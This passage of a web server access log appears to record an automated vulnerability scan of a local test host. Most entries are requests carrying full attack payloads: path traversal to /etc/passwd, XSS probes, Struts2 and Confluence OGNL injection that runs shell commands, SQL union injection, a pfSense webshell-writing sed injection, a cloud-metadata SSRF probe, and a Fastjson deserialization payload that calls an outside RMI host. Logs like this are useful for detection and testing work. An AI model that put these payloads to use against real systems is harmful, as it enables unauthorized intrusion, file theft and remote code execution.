(Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/File/DownloadFile?filePath=wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd&delete=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/app HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.redmine-cli HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.122","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"{\x0D\x0A \x22user\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/requestreset HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /debug/pprof/goroutine?debug=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E/?page=under-construction HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.125","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.128","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin%202/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/_catalog HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.127","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"wimToken=&userid_work=&userid=YWRtaW4=&password_work=&password=&open=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"169.254.169.254","request":"GET http://169.254.169.254/v1/metadata/private-networks HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.152","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ics?tool=search&query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.126","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.126","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.124","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:36 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jeecg-boot/ HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.989","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"action=setup_wizard_cancel&html_response_page=ftpserver.asp&html_response_return_page=ftpserver.asp","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /apply_sec.cgi HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.000","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.105","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.096","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/json/serverinfo/* HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.097","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.096","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\x5Cx3c\x5Cx3fphp+var_dump(md5(\x5Cx27CVE-2021-41282\x5Cx27));unlink(__FILE__)\x5Cx3b\x5Cx3f\x5Cx3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.091","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /proftpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.088","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.091","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.092","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PMA/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.084","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22Lcom.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9v8gvgsmpv8bafg0t00srsujb1z61dit.oast.pro/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"5.001","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jeecg-boot/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=&event2=&event3=&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.093","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:37 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event3=352513&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:38 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", 